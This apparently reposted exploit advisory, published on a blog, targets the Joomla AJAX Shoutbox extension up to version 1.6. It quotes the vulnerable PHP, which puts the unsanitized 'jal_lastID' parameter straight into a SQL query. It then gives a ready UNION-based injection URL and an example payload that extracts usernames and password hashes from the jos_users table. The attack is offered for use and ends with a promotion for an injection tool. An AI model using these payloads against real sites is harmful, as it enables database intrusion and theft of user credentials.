/ / Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability

Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability


Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability


###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability
 
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code: 
113 $jal_lastID = JRequest::getVar( 'jal_lastID',       0        );
114
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
 
[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
 
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
 
[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st
 
###################################################################################



Share on Google Plus

About Elmirakom

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )